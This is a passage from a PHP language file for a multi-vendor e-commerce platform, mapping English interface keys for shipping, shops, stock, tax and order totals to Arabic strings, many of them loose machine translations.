ينسحب', 'seller_zone' => 'منطقة البائع', 'sellers' => 'البائعون', 'sellers_can_see_all_products_that_need_to_be_re_stocked_in_a_section_when_they_reach_this_ReOrder_Level' => 'يمكن للبائعين رؤية جميع المنتجات التي تحتاج إلى إعادة تخزينها في قسم عندما يصلون إلى مستوى إعادة الترتيب هذا', 'sellers_will_download_the_latest_seller_app_version_using_this_URL' => 'سيقوم البائعون بتنزيل أحدث إصدار لتطبيق البائع باستخدام عنوان URL هذا', 'sellers_will_handle_the_shipping_responsibilities_when_you_choose_seller_wise_shipping_method' => 'سيتعامل البائعون مع مسؤوليات الشحن عندما تختار طريقة الشحن الحكيمة للبائع', 'sellersfgm .' => 'SellersFGM.', 'selling_price' => 'سعر البيع', 'senang_pay' => 'رواتب سعيدة', 'send' => 'يرسل', 'send successfully' => 'أرسل بنجاح', 'send_Notification' => 'إرسال إشعار', 'send_Reply' => 'إرسال الرد', 'send_a_message' => 'ارسل رسالة', 'send_a_test_mail_to_your_email' => 'إرسال بريد اختبار إلى بريدك الإلكتروني', 'send_mail' => 'ارسل بريد', 'send_notification' => 'إرسال إشعار', 'send_successfully' => 'أرسل بنجاح', 'send_test_mail' => 'إرسال بريد الاختبار', 'send_us_a_message' => 'أرسل لنا رسالة', 'send_your_wallet_money_while_order' => 'أرسل أموال محفظتك أثناء الطلب', 'sendgrid_mail' => 'بريد SendGrid', 'sendgrid_mail_config' => 'SendGrid Mail Config', 'sent' => 'مرسل', 'sent_in_your_email' => 'أرسلت في بريدك الإلكتروني', 'sent_in_your_phone' => 'أرسلت في هاتفك', 'seo_section' => 'قسم كبار المسئولين الاقتصاديين', 'server' => 'الخادم', 'server_Key' => 'مفتاح الخادم', 'server_key' => 'Server key', 'set_Priority' => 'يضع أولويات', 'set_Up' => 'يثبت', 'set_delivery_address' => 'تعيين عنوان التسليم', 'set_from_map' => 'تعيين من الخريطة', 'set_how_users_of_recover_their_forgotten_password' => 'حدد كيفية استعادة كلمة المرور المنسية الخاصة بهم', 'set_minimum_order_amount' => 'حدد مبلغ الحد الأدنى للطلب', 'set_the_Tax_Amount_in_percentage_here' => 'حدد المبلغ الضريبي في النسبة المئوية هنا', 'set_the_default_commission_amount_that_will_be_received_from_sellers_on_each_order' => 'قم بتعيين مبلغ العمولة الافتراضية التي سيتم استلامها من البائعين في كل طلب', 'set_the_earning_amount_for_each_successful_referral' => 'اضبط مبلغ الكسب لكل إحالة ناجحة', 'set_the_minimum_order_amount_a_customer_must_order_from_the_inhouse_shop' => 'حدد الحد الأدنى لمبلغ الطلب الذي يجب على العميل طلبه من متجر Inhouse', 'set_the_minimum_order_quantity_that_customers_must_choose._Otherwise _the_checkout_process_wonât_start' => 'قم بتعيين الحد الأدنى لترتيب الكمية التي يجب على العملاء اختيارها. وإلا فلن تبدأ عملية الخروج', 'set_the_selling_price_for_each_unit_of_this_product._This_Unit_Price_section_wonât_be_applied_if_you_set_a_variation_wise_price' => 'حدد سعر البيع لكل وحدة من هذا المنتج. لن يتم تطبيق قسم أسعار الوحدة هذا إذا حددت سعرًا حكيماً', 'set_the_shipping_cost_for_this_product_here._Shipping_cost_will_only_be_applicable_if_product-wise_shipping_is_enabled.' => 'اضبط تكلفة الشحن لهذا المنتج هنا. لن تنطبق تكلفة الشحن إلا إذا تم تمكين الشحن المحاكم.', 'set_the_stock_limit_for_the_Reorder_level' => 'حدد حد الأسهم لمستوى إعادة الترتيب', 'set_the_tax_calculation_method_from_here._Select_âInclude_with_productâ_to_combine_product_price_and_tax_on_the_checkout._Pick_âExclude_from_productâ_to_display_product_price_and_tax_amount_separately.' => 'حدد طريقة حساب الضرائب من هنا. حدد  تضمين مع المنتج لدمج أسعار المنتج والضرائب على الخروج. اختر  استبعاد من المنتج لعرض سعر المنتج ومبلغ الضريبة بشكل منفصل.', 'set_vacation_mode_for_shop_means_you_will_be_not_available_receive_order_and_provider_products_for_placed_order_at_that_time' => 'تعيين وضع العطلة للمتجر يعني أنك لن تكون متاحًا لاستلام طلبات المنتجات ومنتجات مقدمي الطلب في ذلك الوقت', 'set_whether_sellers_need_admin_approval_before_adding_new_products_to_their_shops' => 'اضبط ما إذا كان البائعون بحاجة إلى موافقة المسؤول قبل إضافة منتجات جديدة إلى متاجرهم', 'setting' => 'جلسة', 'settings' => 'إعدادات', 'setup' => 'يثبت', 'sgred' => 'sgred', 'share' => 'يشارك', 'shipping' => 'شحن', 'shipping Cost' => 'تكلفة الشحن', 'shipping addresses' => 'عناوين الشحن', 'shipping methods' => 'طرق الشحن', 'shipping types' => 'أنواع الشحن', 'shipping_Address' => 'عنوان الشحن', 'shipping_Charge' => 'رسوم الشحن', 'shipping_Fee' => 'رسوم الشحن', 'shipping_Method' => 'طريقة الشحن', 'shipping_Method_deleted_successfully' => 'تم حذف طريقة الشحن بنجاح', 'shipping_address' => 'عنوان الشحن', 'shipping_address_has_been_given_below' => 'تم تقديم عنوان الشحن أدناه', 'shipping_and_billing_address' => 'عنوان الشحن والفوترة', 'shipping_charge' => 'رسوم الشحن', 'shipping_confirmation_email' => 'البريد الإلكتروني لتأكيد الشحن', 'shipping_cost' => 'تكلفة الشحن', 'shipping_cost_multiply_with_quantity' => 'تكلفة الشحن تضاعف الكمية', 'shipping_details' => 'تفاصيل الشحن', 'shipping_earn' => 'كسب الشحن', 'shipping_fee' => 'رسوم الشحن', 'shipping_id_is_required' => 'معرف الشحن مطلوب', 'shipping_info' => 'معلومات الشحن', 'shipping_input_by_customer' => 'مدخلات الشحن من قبل العميل', 'shipping_method' => 'طريقة الشحن', 'shipping_method_for_In-house_deliver' => 'طريقة الشحن للتسليم الداخلي', 'shipping_method_update' => 'تحديث طريقة الشحن', 'shipping_method_updated_successfully' => 'تم تحديث طريقة الشحن بنجاح', 'shipping_method_updated_successfully!!' => 'تم تحديث طريقة الشحن بنجاح !!', 'shipping_responsibility' => 'مسؤولية الشحن', 'shipping_responsibility_updated_successfully' => 'تم تحديث مسؤولية الشحن بنجاح', 'shipping_responsibility_updated_successfully!!' => 'تم تحديث مسؤولية الشحن بنجاح !!', 'shipping_to' => 'يشحن إلى', 'shipping_type' => 'نوع الشحن', 'shipping_type_updated_successfully!!' => 'نوع الشحن تم تحديثه بنجاح !!', 'shop' => 'محل', 'shop followers' => 'متاجر المتاجر', 'shop_Info' => 'معلومات التسوق', 'shop_Information' => 'تسوق المعلومات', 'shop_Name' => 'اسم المحل', 'shop_Page' => 'صفحة التسوق', 'shop_address' => 'عنوان متجر', 'shop_again_from_your_recent_store' => 'تسوق مرة أخرى من متجرك الأخير', 'shop_banner' => 'لافتة متجر', 'shop_bottom_banner' => 'تسوق لافتة أسفل', 'shop_cart' => 'عربة التسوق', 'shop_details' => 'تفاصيل التسوق', 'shop_does_not_exist' => 'متجر غير موجود', 'shop_info' => 'معلومات التسوق', 'shop_information' => 'تسوق المعلومات', 'shop_logo' => 'شعار متجر', 'shop_name' => 'اسم المحل', 'shop_now' => 'تسوق الآن', 'shop_overview' => 'نظرة عامة على متجر', 'shop_page' => 'صفحة التسوق', 'shop_secondary_banner' => 'تسوق لافتة الثانوية', 'shop_settings' => 'إعدادات التسوق', 'shop_view' => 'عرض متجر', 'shop_wise_with' => 'تسوق مع', 'shopping_cart' => 'عربة التسوق', 'shopping_details' => 'تفاصيل التسوق', 'shops' => 'محلات', 'short_cut_keys' => 'مفاتيح الاختصار', 'short_description' => 'وصف قصير', 'short_title' => 'عنوان قصير', 'show' => 'يعرض', 'show_Billing_Address_In_Checkout' => 'عرض عنوان الفواتير في الخروج', 'show_as_featured' => 'تظهر كما هو مميز', 'show_brand' => 'عرض العلامة التجارية', 'show_brand = ' => 'عرض العلامة التجارية=>', 'show_data' => 'عرض البيانات', 'show_data_by_date_range' => 'إظهار البيانات حسب النطاق التاريخ', 'show_hide_food_menu' => 'عرض قائمة إخفاء الطعام', 'show_locations_on_map' => 'عرض المواقع على الخريطة', 'show_password' => 'عرض كلمة المرور', 'sid' => 'سيد', 'sidebar_Banner' => 'شعار الشريط الجانبي', 'sign-up' => 'اشتراك', 'sign_Out' => 'خروج', 'sign_in' => 'تسجيل الدخول', 'sign_in_with_facebook' => 'قم بتسجيل الدخول باستخدام الفيسبوك', 'sign_in_with_google' => 'الدخول مع جوجل', 'sign_out' => 'خروج', 'sign_up' => 'اشتراك', 'sign_up_with_facebook' => 'اشترك عبر حساب فايسبوك', 'sign_up_with_google' => 'اشترك مع Google', 'signature_product' => 'منتج توقيع', 'signature_product_for_this_season' => 'منتج توقيع لهذا الموسم', 'similar' => 'مشابه', 'similar_Products_From_Other_Stores' => 'منتجات مماثلة من المتاجر الأخرى', 'similar_category_product' => 'منتج فئة مماثل', 'similar_product_from_this_store' => 'منتج مماثل من هذا المتجر', 'similar_product_not_available' => 'منتج مماثل غير متوفر', 'similar_products' => 'منتجات مماثلة', 'sing_in' => 'تسجيل الدخول', 'sing_in_with_facebook' => 'قم بتسجيل الدخول باستخدام الفيسبوك', 'sing_in_with_google' => 'الدخول مع جوجل', 'sing_up' => 'اشتراك', 'sing_up_with_facebook' => 'اشترك عبر حساب فايسبوك', 'sing_up_with_google' => 'اشترك مع Google', 'single_shipping_method' => 'طريقة شحن واحدة', 'single_vendor' => 'بائع واحد', 'site_Key' => 'مفتاح الموقع', 'site_URL' => 'URL الموقع', 'size' => 'مقاس', 'skip' => 'يتخطى', 'sl' => 'SL', 'sl#' => 'SL#', 'slug' => 'سبيكة', 'sms' => 'رسالة قصيرة', 'sms_gateways_configuration' => 'تكوين بوابات الرسائل القصيرة', 'sms_setup' => 'إعداد الرسائل القصيرة', 'smtp' => 'SMTP', 'smtp.mailtrap.io' => 'Smtp.mailtrap.io', 'smtp_mail' => 'البريد SMTP', 'smtp_mail_config' => 'تكوين البريد SMTP', 'so_that_they_can_also_update_their_store_banners_according_to_the_new_theme_ratio' => 'حتى يتمكنوا أيضًا من تحديث لافتات المتاجر الخاصة بهم وفقًا لنسبة السمة الجديدة', 'social_Link_Is_Requeired.' => 'الرابط الاجتماعي مطلوب.', 'social_Login' => 'تسجيل الدخول الاجتماعي', 'social_Media_Already_taken' => 'وسائل التواصل الاجتماعي التي اتخذت بالفعل', 'social_Media_Chatting' => 'وسائل التواصل الاجتماعي الدردشة', 'social_Media_Links' => 'روابط وسائل التواصل الاجتماعي', 'social_Media_inserted_Successfully.' => 'تم إدخال وسائل التواصل الاجتماعي بنجاح.', 'social_Name_Is_Requeired.' => 'الاسم الاجتماعي مطلوب.', 'social_info_updated_successfully.' => 'المعلومات الاجتماعية تحديث بنجاح.', 'social_login' => 'تسجيل الدخول الاجتماعي', 'social_media' => 'وسائل التواصل الاجتماعي', 'social_media_deleted_successfully.' => 'تم حذف وسائل التواصل الاجتماعي بنجاح.', 'social_media_form' => 'شكل وسائل التواصل الاجتماعي', 'social_media_link' => 'رابط وسائل التواصل الاجتماعي', 'social_media_table' => 'جدول وسائل التواصل الاجتماعي', 'software' => 'برمجة', 'software_update' => 'تحديث النظام', 'software_version' => 'إصدار البرنامج', 'sold' => 'مُباع', 'some_actions_are_disabled_because_the_admin_added_coupons' => 'تم تعطيل بعض الإجراءات لأن القسائم المضافة للمشرف', 'some_features_will_changed' => 'سيتم تغيير بعض الميزات', 'some_status_buttons_are_disabled_because_the_admin_added_coupons' => 'يتم تعطيل بعض أزرار الحالة لأن القسائم المضافة للمسؤول', 'soon_Stock_Out' => 'قريبا تخزين', 'sorry' => 'آسف', 'sorry_no_review_found_to_show_you' => 'آسف لم يتم العثور على مراجعة لتظهر لك', 'sorry_product_is_out_of_stock.' => 'المنتج آسف خارج المخزون.', 'sorry_product_out_of_stock' => 'آسف، والمنتجات من المخزون', 'sorry_stock_is_limited' => 'الأسف مخزون محدود', 'sorry_stock_limit_exceeded.' => 'آسف الحد الأقصى تجاوز.', 'sorry_the_minimum_order_quantity_does_not_match' => 'آسف لا تتطابق كمية الحد الأدنى للطلب', 'sorry_this_item_is_currently_sold_out' => 'آسف ، تم بيع هذا العنصر حاليًا', 'sort_by' => 'ترتيب حسب', 'sort_by_(high_to_low)' => 'فرز بواسطة (مرتفع إلى منخفض)', 'sort_by_(low_to_high)' => 'فرز حسب (منخفضة إلى عالية)', 'sound' => 'صوت', 'special' => 'خاص', 'ssl commerz' => 'SSL Commerz', 'ssl_commerz' => 'SSL Commerz', 'ssl_commerz_payment' => 'SSL Commerz الدفع', 'sslcommerz' => 'SSLCommerz', 'star' => 'نجمة', 'start' => 'يبدأ', 'start Date' => 'تاريخ البدء', 'start date' => 'تاريخ البدء', 'start_Date' => 'تاريخ البدء', 'start_a_conversation' => 'بدء محادثة', 'start_a_new_message' => 'ابدأ رسالة جديدة', 'start_date' => 'تاريخ البدء', 'start_from' => 'يبدأ من', 'start_typing' => 'ابدأ الطباعة', 'start_typing...' => 'ابدأ الطباعة...', 'started_on' => 'بدأ في', 'status' => 'حالة', 'status updated successfully' => 'تم تحديث الحالة بنجاح', 'status_Update_Successfully' => 'تحديث الحالة بنجاح', 'status_change_successfully' => 'تغيير الحالة بنجاح', 'status_not_changable_now' => 'الحالة غير قابلة للتغيير الآن', 'status_update_failed' => 'فشل تحديث الحالة', 'status_update_failed.' => 'فشل تحديث الحالة.', 'status_updated_failed.' => 'فشل تحديث الحالة.', 'status_updated_successfully' => 'تم تحديث الحالة بنجاح', 'stock' => 'مخزون', 'stock_Available' => 'مخزون متاح', 'stock_available' => 'مخزون متاح', 'stock_limit_products' => 'منتجات الحد الأقصى', 'stock_limit_products_list' => 'قائمة منتجات حد الأسهم', 'stock_not_available' => 'الأسهم غير متوفرة', 'stock_out' => 'المخزن نفذ', 'stock_sort_by_(high_to_low)' => 'فرز المخزون بواسطة (مرتفع إلى منخفض)', 'stock_sort_by_(low_to_high)' => 'فرز المخزون بواسطة (منخفض إلى مرتفع)', 'stock_status' => 'حالة الرصيد، وضع مخزون', 'storage_bucket' => 'دلو التخزين', 'store' => 'محل', 'store_Client_ID' => 'تخزين معرف العميل', 'store_Client_Secret_Key' => 'تخزين المفتاح السري للعميل', 'store_ID' => 'معرف المتجر', 'store_address' => 'عنوان المتجر', 'store_banner' => 'لافتة المتجر', 'store_list' => 'قائمة المتجر', 'store_logo' => 'متجر الشعار', 'store_name' => 'اسم المتجر', 'store_password' => 'تخزين كلمة المرور', 'stores' => 'المتاجر', 'stores_one' => 'المتاجر واحدة', 'stores_two' => 'المتاجر اثنين', 'street_1 _street_2 _street_3 _street_4' => 'شارع 1 شارع 2 شارع 3 شارع 4', 'string' => 'خيط', 'stripe' => 'شريط', 'sub_Categories' => 'الفئات الفرعية', 'sub_Category' => 'تصنيف فرعي', 'sub_Sub_Categories' => 'الفئات الفرعية الفرعية', 'sub_Sub_Category' => 'الفئة الفرعية الفرعية', 'sub_Title' => 'العنوان الفرعي', 'sub_categories' => 'الفئات الفرعية', 'sub_category' => 'تصنيف فرعي', 'sub_category_Logo' => 'شعار الفئة الفرعية', 'sub_category_form' => 'نموذج الفئة الفرعية', 'sub_category_list' => 'قائمة الفئة الفرعية', 'sub_category_table' => 'جدول الفئة الفرعية', 'sub_sub_categories' => 'الفئات الفرعية الفرعية', 'sub_sub_category' => 'الفئة الفرعية الفرعية', 'sub_sub_category_form' => 'نموذج الفئة الفرعية الفرعية', 'sub_sub_category_list' => 'قائمة الفئة الفرعية الفرعية', 'sub_sub_category_name' => 'اسم الفئة الفرعية الفرعية', 'sub_sub_category_table' => 'جدول الفئة الفرعية الفرعية', 'sub_total' => 'مجموع', 'sub_totalvfdv' => 'sub totalvfdv', 'subcategory' => 'تصنيف فرعي', 'subject' => 'موضوع', 'submit' => 'يُقدِّم', 'submit_a_review' => 'إرسال مراجعة', 'submit_a_ticket' => 'تسجيل التذكرة', 'submit_message' => 'تقديم رسالة', 'submit_new_ticket' => 'إرسال تذكرة جديدة', 'submition_date' => 'تاريخ التراجع', 'subscribe' => 'يشترك', 'subscribe to our new channel to get latest updates' => 'اشترك في قناتنا الجديدة للحصول على آخر التحديثات', 'subscribe_our_newsletter_to_get_latest_updates' => 'اشترك في رسائلنا الإخبارية للحصول على آخر التحديثات', 'subscribe_to_our_new_channel_to_get_latest_updates' => 'اشترك في قناتنا الجديدة للحصول على آخر التحديثات', 'subscriber_list' => 'قائمة المشتركين', 'subscribers' => 'مشتركين', 'subscription_date' => 'تاريخ الاشتراك', 'subscriptions' => 'الاشتراكات', 'subtotal' => 'نطاق فرعي', 'successfully added!' => 'أضيف بنجاح!', 'successfully product added!' => 'وأضاف المنتج بنجاح!', 'successfully product deleted!' => 'تم حذف المنتج بنجاح!', 'successfully product updated!' => 'تم تحديث المنتج بنجاح!', 'successfully removed!' => 'تمت إزالته بنجاح!', 'successfully review submitted!' => 'مراجعة بنجاح!', 'successfully updated!' => 'تم التحديث بنجاح!', 'successfully_added' => 'أضيف بنجاح', 'successfully_added!' => 'أضيف بنجاح!', 'successfully_added_review' => 'تمت إضافة مراجعة بنجاح', 'successfully_canceled' => 'تم إلغاؤه بنجاح', 'successfully_copied' => 'نسخ بنجاح', 'successfully_removed' => 'تمت إزالته بنجاح', 'successfully_updated' => 'تم التحديث بنجاح', 'successfully_updated!' => 'تم التحديث بنجاح!', 'successfully_uploaded' => 'تم تحميلها بنجاح', 'summary' => 'ملخص', 'support' => 'يدعم', 'support ticket convs' => 'دعم التذاكر', 'support tickets' => 'تذاكر الدعم الفني', 'support_Ticket' => 'بطاقة الدعم', 'support_Ticket_Answer' => 'دعم تذكرة الإجابة', 'support_section' => 'قسم الدعم', 'support_ticket' => 'بطاقة الدعم', 'suspend' => 'تعليق', 'suspend_this_seller' => 'تعليق هذا البائع', 'system' => 'نظام', 'system_Addons' => 'addons النظام', 'system_Settings' => 'اعدادات النظام', 'system_Setup' => 'إعداد النظام', 'system_default' => 'النظام الافتراضي', 'system_default_currency' => 'العملة الافتراضية للنظام', 'system_setup' => 'إعداد النظام', 't_id' => 'تي معرف', 'table' => 'طاولة', 'tag' => 'بطاقة شعار', 'tags' => 'العلامات', 'tax' => 'ضريبة', 'tax_Collected' => 'الضريبة التي تم جمعها', 'tax_Model' => 'نموذج الضرائب', 'tax_amount' => 'قيمة الضريبة', 'tax_calculation' => 'حساب الضريبة', 'tax_fee' => 'الرسوم الضريبية', 'tax_incl.' => 'ضريبة بما في ذلك.', 'tax_included' => 'شامل الضريبة', 'team_ID' => 'معرف الفريق', 'team_id' => 'معرف الفريق', 'template_id' => 'معرف القالب', 'temporary_Close' => 'إغلاق مؤقت', 'temporary_block_time' => 'وقت كتلة مؤقت', 'temporary_close' => 'إغلاق مؤقت', 'temporary_close_inactive_successfully' => 'وثيق مؤقت غير نشط بنجاح', 'temporary_close_updated_successfully' => 'تم تحديث الإغلاق المؤقت بنجاح', 'temporary_closed' => 'مغلق مؤقت', 'temporary_login_block_time' => 'وقت كتلة تسجيل الدخول المؤقت', 'terms_&_conditions' => 'البنود و الظروف', 'terms_&_policy' => 'الشروط والسياسة', 'terms_and_condition' => 'الأحكام والشروط', 'test' => 'امتحان', 'test 1' => 'اختبار 1', 'test product' => 'اختبار المنتج', 'test product 1' => 'اختبار المنتج 1', 'test product 2' => 'اختبار المنتج 2', 'test product minus value' => 'اختبار المنتج ناقص القيمة', 'test shipping' => 'اختبار الشحن', 'test_SMTP_connection' => 'اختبار اتصال SMTP', 'test_your_email_integration' => 'اختبر تكامل بريدك الإلكتروني', 'text' => 'نص', 'text_color' => 'لون الخط', 'text_fee' => 'الرسوم الضريبية', 'text_updated_successfully' => 'تم تحديث النص بنجاح', 'thank_you_for_order' => 'شكرا لك على الطلب', 'thank_you_for_your_order' => 'شكرا لطلبك', 'thank_you_for_your_verification' => 'شكرا لك على التحقق الخاص بك', 'thanks' => 'شكرًا', 'thanks_for_shopping_with' => 'شكرا للتسوق مع', 'thanks_for_the_order' => 'شكرا على الطلب', 'the_amount_needs_to_be_between' => 'يجب أن يكون المبلغ بين', 'the_app_download_link_is_the_URL_that_allows_users_to_update_the_app_by_clicking_the_Update_App_button_within_the_app_itself' => 'رابط تنزيل التطبيق هو عنوان URL الذي يتيح للمستخدمين تحديث التطبيق بالنقر فوق الزر ث التطبيق داخل التطبيق نفسه', 'the_bonus_amount_will_be_deduct_from_admin_wallet_&_will_consider_as_admin_expense' => 'سيتم خصم مبلغ المكافأة من محفظة المشرف وسيعتبر نفقات المسؤول', 'the_coupon_discount_bearer_is_admin' => 'حامل خصم القسيمة هو المسؤول', 'the_lowest_number_get_highest_priority' => 'أقل عدد يحصل على أولوية قصوى', 'the_lowest_number_will_get_highest_priority' => 'أدنى رقم سيحصل على أولوية قصوى', 'the_lowest_number_will_get_the_highest_priority' => 'أدنى رقم سيحصل على أعلى أولوية', 'the_minimum_customer_app_version_required_for_the_app_functionality' => 'الحد الأدنى لإصدار تطبيق العميل المطلوب لوظيفة التطبيق', 'the_minimum_deliveryman_app_version_required_for_the_app_functionality' => 'إصدار الحد الأدنى للتسليم المطلوب لوظيفة التطبيق', 'the_minimum_seller_app_version_required_for_the_app_functionality' => 'الحد الأدنى لإصدار تطبيق البائع المطلوب لوظيفة التطبيق', 'the_ongoing_order_amount_will_be_shown_here' => 'سيتم عرض مبلغ الطلب المستمر هنا', 'the_page_you_requested_could_not_be_found' => 'الصفحة المطلوبة لا يمكن العثور عليه', 'the_product_report_will_show_based_on_the_product_added_date' => 'سيظهر تقرير المنتج بناءً على تاريخ المنتج المضافة', 'the_products_are_shown_in_this_list _which_quantity_is_below' => 'يتم عرض المنتجات في هذه القائمة ما هي الكمية أدناه', 'theme_delete_successfully' => 'السمة حذف بنجاح', 'theme_mode' => 'وضع الموضوع', 'theme_setup' => 'إعداد الموضوع', 'theme_templates' => 'قوالب الموضوع', 'theme_upload_successfully!' => 'تحميل الموضوع بنجاح!', 'there_may_be_some_features_that_are_not_available_in_other_themes.' => 'قد يكون هناك بعض الميزات غير المتوفرة في موضوعات أخرى.', 'these_saved_data_is_only_applicable_only_for_' => 'هذه البيانات المحفوظة قابلة للتطبيق فقط على', 'they_can_browse_and_search_for_products_from_each_brand_inside_any_shop' => 'يمكنهم تصفح المنتجات والبحث عنها من كل علامة تجارية داخل أي متجر', 'they_cannot_purchase_or_place_order_from_your_shop' => 'لا يمكنهم شراء أو تقديم الطلب من متجرك', 'they_register_6Valley_with_special_offer' => 'يسجلون 6valley بعرض خاص', 'think_before_you_proceed' => 'فكر قبل المتابعة', 'third_party_apis' => 'واجهات برمجة تطبيقات الطرف الثالث', 'third_party_delivery_tracking_id' => 'معرف تتبع توصيل الطرف الثالث', 'third_step' => 'خطوة ثالثة', 'this_Month' => 'هذا الشهر', 'this_Months_Statistics' => 'هذه الإحصائيات أشهر', 'this_Week' => 'هذا الاسبوع', 'this_Year' => 'هذا العام', 'this_app_version_means_the_minimum_version_of_Seller_Deliveryman_and_Customer_apps_that_are_required_for_the_update' => 'يعني إصدار التطبيق هذا الحد الأدنى من إصدار Seller Deliveryman وتطبيقات العملاء المطلوبة للتحديث', 'this_count_is_the_summation_of' => 'هذا العدد هو ملخص', 'this_count_is_the_summation_of_delivered_orders' => 'هذا العدد هو تلخيص أوامر تسليم', 'this_coupon_is_valid_for_use_after_a_minimum_purchase_of' => 'هذه القسيمة صالحة للاستخدام بعد الحد الأدنى من الشراء', 'this_discount_is_not_applied_for_this_amount' => 'لا يتم تطبيق هذا الخصم على هذا المبلغ', 'this_field_required' => 'هذا الحقل المطلوب', 'this_helps_to_keep_your_new_password_secure.' => 'هذا يساعد على إبقاء كلمة المرور الجديدة آمنة.', 'this_is_the_service_key_ID_file_and_also_after_AuthKey_that_is_the_key_ID' => 'هذا هو ملف معرف مفتاح الخدمة وأيضًا بعد Authkey هذا هو معرف المفتاح', 'this_item_is_currently_sold_out' => 'تم بيع هذا العنصر حاليًا', 'this_module_will_run_for_updates_after_version_13.1' => 'سيتم تشغيل هذه الوحدة للتحديثات بعد الإصدار 13.1', 'this_month' => 'هذا الشهر', 'this_number_indicates_how_much_data_will_be_shown_in_the_list_or_table' => 'يشير هذا الرقم إلى مقدار البيانات التي سيتم عرضها في القائمة أو الجدول', 'this_shop_currently_close_now' => 'هذا المتجر يغلق حاليًا الآن', 'this_shop_is_temporary_closed._You_cannot_add_product_to_cart_from_this_shop_for_now' => 'هذا المتجر مغلق مؤقت. لا يمكنك إضافة منتج إلى عربة من هذا المتجر الآن', 'this_shop_is_temporary_closed_or_on_vacation' => 'هذا المتجر مغلق مؤقت أو في إجازة', 'this_shop_is_temporary_closed_or_on_vacation.' => 'هذا المتجر مغلق مؤقت أو في إجازة.', 'this_shop_is_temporary_closed_or_on_vacation._You_cannot_add_product_to_cart_from_this_shop_for_now' => 'هذا المتجر مغلق مؤقت أو في إجازة. لا يمكنك إضافة منتج إلى عربة من هذا المتجر الآن', 'this_week' => 'هذا الاسبوع', 'this_will_allow_the_system_to_send_emails_using_the_configured_SMTP_settings' => 'سيسمح هذا للنظام بإرسال رسائل بريد إلكتروني باستخدام إعدادات SMTP المكونة', 'this_year' => 'هذا العام', 'this_year_earning' => 'هذا العام يكسب', 'ticket' => 'تذكرة', 'ticket_closed_successfully.' => 'تغلق تذكرة بنجاح.', 'time' => 'وقت', 'time_zone' => 'وحدة زمنية', 'title' => 'عنوان', 'tls' => 'TLS', 'to' => 'ل', 'to_cancel_invoice' => 'لإلغاء الفاتورة', 'to_click_add_new_customer' => 'للنقر فوق إضافة عميل جديد', 'to_click_cancel_cart_item_all' => 'للنقر فوق', 'to_click_clear_cart' => 'للنقر فوق Clear Cart', 'to_click_coupon_discount' => 'للنقر على خصم القسيمة', 'to_click_extra_discount' => 'للنقر على خصم إضافي', 'to_click_new_order' => 'للنقر على طلب جديد', 'to_click_order' => 'للنقر فوق الطلب', 'to_click_payment_submit' => 'للنقر فوق الدفع إرسال', 'to_click_short_cut_keys' => 'للنقر فوق مفاتيح مختصرة', 'to_close_payment_submit' => 'لإغلاق الدفع', 'to_date' => 'ان يذهب في موعد', 'to_decrease_product_quantity_use_minus_before_number._Ex= -10' => 'لتقليل كمية المنتج استخدام ناقص قبل الرقم. على سبيل المثال=> -10', 'to_delete_change_the_default_language_first' => 'لحذف تغيير اللغة الافتراضية أولا', 'to_focus_search_input' => 'لتركيز إدخال البحث', 'to_get_delivery_updates' => 'للحصول على تحديثات التسليم', 'to_get_site_key_and_secret_key_Go_to_the_Credentials_page' => 'للحصول على مفتاح الموقع والمفتاح السري انتقل إلى صفحة بيانات الاعتماد', 'to_print_invoice' => 'لطباعة الفاتورة', 'to_submit_add_new_customer_form' => 'لتقديم إضافة نموذج عميل جديد', 'to_the_featured_section' => 'إلى القسم المميز', 'to_view_your_order_sign_into_your' => 'لعرض علامة طلبك في الخاص بك', 'to_view_your_order_sign_into_your 6Valley account_and_please_click_below_button' => 'لعرض علامة طلبك على حساب 6valley الخاص بك ويرجى النقر أدناه على الزر', 'to_view_your_order_sign_into_your6Valley' => 'لعرض علامة طلبك في your6valley', 'to_wallet' => 'إلى محفظة', 'todays_Statistics' => 'إحصائيات اليوم', 'toggle button from the top' => 'زر التبديل من الأعلى', 'token' => 'رمز', 'too_many_attempts. please_try_again_after_' => 'محاولات كثيرة. الرجاء المحاولة مرة أخرى بعد', 'top' => 'قمة', 'top rated' => 'أعلى التقييمات', 'top-rated' => 'أعلى التقييمات', 'top_Delivery_Man' => 'أعلى رجل توصيل', 'top_Side_Banner' => 'لافتة الجانب العلوي', 'top_customer' => 'كبار العميل', 'top_fashion_house' => 'أعلى دار الأزياء', 'top_rated' => 'أعلى التقييمات', 'top_rated_product' => 'أعلى المنتجات تصنيف', 'top_rated_product_from_this_store' => 'منتج أعلى تصنيف من هذا المتجر', 'top_rated_seller' => 'أعلى تصنيف البائع', 'top_selling_products' => 'أفضل منتجات البيع', 'top_selling_store' => 'أعلى متجر بيع', 'top_store_by_order_received' => 'المتجر الأعلى حسب الطلب المستلم', 'topic' => 'عنوان', 'total' => 'المجموع', 'total_Amount' => 'المبلغ الإجمالي', 'total_Amount_Sold' => 'إجمالي المبلغ المباع', 'total_Commission_given' => 'إجمالي العمولة المعطاة', 'total_Coupon_Discount' => 'إجمالي خصم القسيمة', 'total_Customers' => 'إجمالي العملاء', 'total_Delivery_Charge' => 'إجمالي رسوم التوصيل', 'total_Deliveryman' => 'إجمالي التوصيل', 'total_Discount_Given' => 'إجمالي الخصم المعطى', 'total_Discounted_Amount' => 'إجمالي المبلغ المخفض', 'total_Earning' => 'مجموع الأرباح', 'total_Earnings' => 'الأرباح الكلية', 'total_Expense' => 'المصاريف الكلية', 'total_Expense_Amount' => 'إجمالي مبلغ النفقات', 'total_In-House_Products' => 'إجمالي المنتجات في المنزل', 'total_In_House_Products' => 'إجمالي المنتجات المنزلية', 'total_Order' => 'من أجل الكاملة', 'total_Order_Amount' => 'إجمالي مبلغ الطلب', 'total_Ordered_Product_Price' => 'إجمالي سعر المنتج المطلوب', 'total_Orders' => 'إجمالي الطلبات', 'total_Price' => 'السعر الكلي', 'total_Product' => 'إجمالي المنتج', 'total_Product_Amount' => 'إجمالي مبلغ المنتج', 'total_Product_Discount' => 'إجمالي خصم المنتج', 'total_Product_Sale' => 'إجمالي بيع المنتج', 'total_Products' => 'إجمالي المنتجات', 'total_Quantity' => 'الكمية الإجمالية', 'total_Quantity_Sold' => 'إجمالي الكمية المباعة', 'total_Sale' => 'إجمالي البيع', 'total_Seller' => 'إجمالي البائع', 'total_Seller_Products' => 'إجمالي منتجات البائع', 'total_Shop' => 'مجموع المتجر', 'total_Shop_Earnings' => 'إجمالي أرباح المتجر', 'total_Stores' => 'مجموع المتاجر', 'total_Tax' => 'مجموع الضريبة', 'total_Transactions' => 'إجمالي المعاملات', 'total_amount' => 'المبلغ الإجمالي', 